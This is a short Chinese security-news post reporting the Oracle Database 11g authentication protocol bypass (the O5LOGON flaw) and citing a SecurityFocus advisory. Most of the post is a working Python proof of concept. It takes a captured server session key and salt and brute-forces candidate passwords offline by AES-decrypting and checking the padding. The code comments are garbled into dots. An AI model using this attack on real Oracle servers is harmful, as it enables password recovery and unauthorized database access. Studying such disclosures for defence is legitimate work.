最新Oracle Database验证协议安全绕过漏洞

2012-10-21 100062人围观 ,发现 5 个不明物体 漏洞

Oracle Database被发现容易造成远程安全绕过漏洞,并且影响到自身的验证协议。攻击者可以利用此漏洞绕过数据库验证从而获得对数据库未经授权的访问。

受影响版本: Oracle Database 11g Release 1 and 11g Release 2

开用代码如下:

#-*-coding:utf8 -*-
      
    import hashlib
    from Crypto.Cipher import AES
      
    def decrypt(session,salt,password):
            pass_hash = hashlib.sha1(password+salt)
      
            #......... ..... ..... .......... .. 24 ....
            key = pass_hash.digest() + '\x00\x00\x00\x00'
            decryptor = AES.new(key,AES.MODE_CBC)
            plain = decryptor.decrypt(session)
            return plain
      
    #............. ........... ...... 48 ....
    session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
      
    #.... 10 ....
    salt_hex = 'A7193E546377EC56639E'
      
    passwords = ['test','password','oracle','demo']
      
    for password in passwords:
            session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password)
            print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex'))
            if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08':
                    print 'PASSWORD IS "%s"' % password
                    break
来源source:http://www.securityfocus.com/bid/55651/discuss
发表评论

已有 5 条评论

取消
Loading...
css.php